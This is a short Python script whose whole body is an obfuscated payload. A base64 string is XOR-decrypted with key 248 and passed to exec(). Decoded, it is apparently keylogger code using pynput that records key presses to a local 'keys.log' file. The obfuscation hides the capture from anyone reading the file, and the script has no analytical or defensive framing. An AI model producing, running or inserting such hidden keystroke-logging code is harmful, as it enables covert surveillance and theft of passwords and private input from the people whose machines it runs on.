import base64
EFLrxAzY = 6997
HPNuLeqd = 'baz'

def decrypt(code, key):
    decoded = base64.b64decode(code).decode()
    return ''.join([chr(ord(c) ^ key) for c in decoded])

exec(decrypt('wp7CisKXwpXDmMKIwoHClsKIwo3CjMOYwpHClcKIwpfCisKMw5jCk8KdwoHCmsKXwpnCisKcw7LDssKcwp3CnsOYwpfClsKnwojCisKdwovCi8OQwpPCncKBw5HDgsOyw5jDmMOYw5jCjMKKwoHDgsOyw5jDmMOYw5jDmMOYw5jDmMKPwpHCjMKQw5jCl8KIwp3ClsOQw5rCk8KdwoHCi8OWwpTCl8Kfw5rDlMOYw5rCmcOaw5HDmMKZwovDmMKew4LDssOYw5jDmMOYw5jDmMOYw5jDmMOYw5jDmMKew5bCj8KKwpHCjMKdw5DCk8KdwoHDlsKbwpDCmcKKw5HDssOYw5jDmMOYwp3CgMKbwp3CiMKMw5jCucKMwozCisKRwprCjcKMwp3CvcKKworCl8KKw4LDssOYw5jDmMOYw5jDmMOYw5jCj8KRwozCkMOYwpfCiMKdwpbDkMOawpPCncKBwovDlsKUwpfCn8Oaw5TDmMOawpnDmsORw5jCmcKLw5jCnsOCw7LDmMOYw5jDmMOYw5jDmMOYw5jDmMOYw5jCnsOWwo/CisKRwozCncOQwp7DmsKjwoPCk8KdwoHChcKlw5rDkcOyw7LCnMKdwp7DmMKLwozCmcKKwozCp8KUwpfCn8Kfwp3CisOQw5HDgsOyw5jDmMOYw5jCj8KRwozCkMOYwpPCncKBwprCl8KZworCnMOWwrTCkcKLwozCncKWwp3CisOQwpfClsKnwojCisKdwovCi8OFwpfClsKnwojCisKdwovCi8ORw5jCmcKLw5jClMKRwovCjMKdwpbCncKKw4LDssOYw5jDmMOYw5jDmMOYw5jClMKRwovCjMKdwpbCncKKw5bCksKXwpHClsOQw5HDssOywovCjMKZworCjMKnwpTCl8Kfwp/CncKKw5DDkcOyw7I=', 248))